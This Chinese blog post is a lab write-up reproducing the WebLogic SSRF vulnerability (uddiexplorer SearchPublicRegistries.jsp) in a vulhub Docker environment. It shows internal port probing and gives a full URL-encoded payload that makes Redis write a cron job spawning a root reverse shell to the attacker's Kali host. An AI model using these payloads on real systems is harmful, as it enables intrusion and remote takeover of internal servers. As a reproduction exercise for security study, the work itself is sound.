vulhub weblogic ssrf漏洞复现

最新推荐文章于 2023-11-25 21:58:57 发布
最新推荐文章于 2023-11-25 21:58:57 发布
阅读量117 收藏
点赞数 2
分类专栏: vulhub靶场 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129788583
版权

SSRF简介

        SSRF是一种由攻击者构造形成有服务器发起求情的一个安全漏洞,一般情况下,攻击目标是从外网无法访问的内部系统,正是因为它由服务端发起的,所以他能请求到与他相连而与外网隔离点内部系统。

环境搭建

kali(192.168.121.139)

ubuntu(192.168.121.131)

cd vulhub-master/weblogic/ssrf

进入目录

docker-compose up -d 启动环境

docker ps

漏洞复现

访问Weblogic http://192.168.121.131:7001/console/login/LoginForm.jsp 

SSRF漏洞位于http://192.168.121.131:7001/uddiexplorer/SearchPublicRegistries.jsp,点击search按钮,用burp抓包 

 

探测内网7001端口:

右侧返回了404,说明内网开启了7001端口

 访问的端口不开放则会出现“not connect over”内容提示

也可利用GET请求,payload:

192.168.121.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

用burp抓包

 

docker exec -it 2a1 /bin/bash 进入容器,查看ip 

探测redis容器是否开启6379端口

可以看到存在服务:

利用redis反弹shell

1.发送三条redis命令,将反弹shell脚本写入/etc/crontab

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.121.139/1919 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

qwezxc

 2.进行url编码

test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.121.139%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

 3.构造payload,访问

http://192.168.121.131:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.27.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.121.139%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

 打开kali监听,等待一会儿,成功反弹shell 

查看redis容器的/etc/crontab,命令被成功写到crontab中

 

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
漏洞复现-vulhub复现WeblogicSSRF漏洞
sweetie 的博客
05-08 1447
模拟WeblogicSSRF漏洞实验: 1.打开搭建好vulhub的虚拟机,输入su切换到root用户 如果不切换,则会报下面的错 2、进入到vulhubweblogic/ssrf/中用gedit打开靶场说明书README.md ls gedit README.md 3、使用docker-compose up -d命令打开靶场,复制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 4、用ifconfig或ip addr
漏洞复现篇——利用vulhub模拟WeblogicSSRF漏洞
爱国小白帽
01-15 3173
SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 423
在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell
攻击Redis
mole_exp的博客
05-10 1317
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1865
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic相关漏洞
05-03
WebLogic 相关漏洞概述 WebLogic 是 Oracle 公司出品的一款 Java EE 应用服务器,广泛应用于企业级应用系统中。然而,WebLogic 也存在一些漏洞,可能会被攻击者利用,导致严重的安全问题。以下是 WebLogic 相关漏洞...
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
最新发布
guijianchouxyz的博客
11-25 879
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5606
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 2010
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2677
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
浅谈SSRF 加redis反弹shell
god_Zeo的安全博客
03-22 2796
0x00 SSRF简介和原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务,来造成对内...
利用redis未授权访问漏洞获取主机权限
Bird&Bird
05-18 1692
目录1、漏洞描述2、漏洞影响版本3、漏洞危害4、漏洞利用 1、漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在
复现weblogic ssrf漏洞
weixin_67813445的博客
03-19 97
Weblogic服务端请求伪造漏洞出现在uddi组件,也就是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。
Weblogic - SSRF攻击内网redis服务漏洞
HAKUNAMATATATTA的博客
12-05 1005
SSRF(Server-Side Request Forgery),服务端请求伪造,是一种由攻击者构造形成由服务端发起请求的一个漏洞,一般情况下,SSRF攻击的目标是从外部网络无法访问的内部系统。
Windows提权
小袁的博客
11-20 1474
windows提权学习过程中的一些总结
vulhub weblogic ssrf复现
08-31
要在vulhub复现WebLogicSSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值